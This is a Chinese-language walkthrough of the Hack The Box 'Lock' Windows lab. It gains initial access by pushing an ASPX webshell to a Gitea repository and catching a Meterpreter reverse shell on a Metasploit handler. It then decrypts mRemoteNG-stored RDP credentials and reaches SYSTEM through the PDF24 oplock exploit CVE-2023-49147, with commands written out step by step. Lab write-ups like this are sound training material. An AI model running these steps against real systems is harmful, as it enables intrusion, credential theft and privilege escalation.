【渗透测试】HTB靶场之Lock 全过程wp

Lock

Lock 是一台简单难度的 Windows 靶机。解题流程包括：枚举 Gitea 仓库找到个人访问令牌（PAT）；利用该令牌在服务器上部署 ASPX 网页后门，从而获得初始立足点；从 mRemoteNG 配置文件中解密出密码，得到新用户账户的登录权限；最后利用 PDF24 程序中的本地提权漏洞，获取 SYSTEM 权限的 Shell。
信息收集

目标ip:10.129.234.64
kali ip:10.10.16.4

1. ┌──(root㉿kali)-[~/桌面/HTB]└─# nmap -A -T4 10.129.234.64          Starting Nmap 7.95 ( https://nmap.org ) at 2026-02-15 01:34 ESTNmap scan report for 10.129.234.64Host is up (0.30s latency).Not shown: 996 filtered tcp ports (no-response)PORT     STATE SERVICE       VERSION80/tcp   open  http          Microsoft IIS httpd 10.0|_http-server-header: Microsoft-IIS/10.0|_http-title: Lock - Index| http-methods: |_  Potentially risky methods: TRACE445/tcp  open  microsoft-ds?3000/tcp open  http          Golang net/http server|_http-title: Gitea: Git with a cup of tea| fingerprint-strings: |   GenericLines, Help, RTSPRequest: |     HTTP/1.1 400 Bad Request|     Content-Type: text/plain; charset=utf-8|     Connection: close|     Request|   GetRequest: |     HTTP/1.0 200 OK|     Cache-Control: max-age=0, private, must-revalidate, no-transform|     Content-Type: text/html; charset=utf-8|     Set-Cookie: i_like_gitea=74301fab8c80b509; Path=/; HttpOnly; SameSite=Lax|     Set-Cookie: _csrf=7YhSALV0ZBSIvHetLhey94Wp5Es6MTc3MTEzNzQyMDEwNTU1NjcwMA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax|     X-Frame-Options: SAMEORIGIN|     Date: Sun, 15 Feb 2026 06:37:00 GMT|     |     |     |     |     Gitea: Git with a cup of tea|      test.aspx

复制代码

然后我们使用msfconsole启动监听器，以便在webshell触发后捕获反向shell

1. msfconsole -q -x "use exploit/multi/handler;set PAYLOAD windows/x64/meterpreter/reverse_tcp;set LHOST 10.10.16.4;set LPORT 4444;run"

复制代码

1. git add test.aspxgit commit -m "reverse shell"git push

复制代码

再回到website目录下，去访问test.aspx

得到shell
在C:\Gitea\data下有一个gitea.db的数据库文件
我们尝试使用445端口smb共享

但是没有权限
使用gitea命令更改管理员密码

1. .\gitea admin user change-password -u administrator -p chenzi123

复制代码

发现修改成功

成功登陆
但是并没有什么东西

字段名取值渗透测试解读EncryptionEngineAES密码的加密算法是 AES（GCM 模式），这是解密的关键前提BlockCipherModeGCMAES 的分组密码模式，解密工具需要匹配这个模式KdfIterations1000密钥派生函数的迭代次数，解密时需要用到ProtectedsDkrKn0JrG4oAL4GW8BctmMNAJfcdu/ahPSQn3W5DPC3vPRiNwfo7OH11trVPbhwpy+1FnqfcPQZ3olLRy+DhDFpmRemoteNG 的主加密密钥（Base64 编码），解密密码必须依赖这个值NameRDP/Gale这个连接配置的名称，指向用户 GaleUsernameGale.Dekarios靶机上的有效用户账号（核心！后续登录 / 提权要用）PasswordTYkZkvR2YmVlm2T2jBYTEhPU2VafgW1d9NSdDX+hUYwBePQ/2qKx+57IeOROXhJxA7CczQzr1nRm89JulQDWPw==该用户的加密密码（Base64 编码），需要解密成明文HostnameLock连接的目标主机名（即靶机本身）ProtocolRDP连接协议是 RDP（远程桌面），端口 3389Port3389RDP 默认端口，解密密码后可尝试远程登录加密密码

1. TYkZkvR2YmVlm2T2jBYTEhPU2VafgW1d9NSdDX+hUYwBePQ/2qKx+57IeOROXhJxA7CczQzr1nRm89JulQDWPw==

复制代码

我们可以使用mRemoteNG进行解密

1. git clone https://github.com/kmahyyg/mremoteng-decryptpython mremoteng_decrypt.py -rf config.xmlUsername: Gale.DekariosHostname: LockPassword: ty8wnW9qCKDosXo6

复制代码

发现内容信息里有关RDP，成功获取RDP凭据。使用这些凭据，我们可以建立到该机器的RDP会话。

1. xfreerdp /v:10.129.234.64 /u:Gale.Dekarios /p:ty8wnW9qCKDosXo6

复制代码

成功在桌面得到flag
权限提升

利用CVE-2023-49147中的PDF24漏洞获取NT系统权限

找到了原始安装文件，接下来还需要SetOpLock

1. https://github.com/googleprojectzero/symboliclink-testing-tools/releases/tag/v1.0

复制代码

下载好后直接复制进来就行

成功下载后，我们执行以下命令在PDF24使用的faxPrnlnt.log文件上创建oplock

1. .\SetOpLock.exe "C:\Program Files\PDF24\faxPrnInst.log" -r

复制代码

在oplock机制启动的情况下，我们打开一个新的命令行窗口，并使用易受攻击的PDF24 MSI安装程序触发修复安装。

1. msiexec.exe /fa C:\_install\pdf24-creator-11.15.1-x64.msi

复制代码

一直按确定即可
在得到这个界面时候

使用火狐
然后启动后，使用ctrl+o 输入cmd

得到root

来源：程序园用户自行投稿发布，如果侵权，请联系站长删除
免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！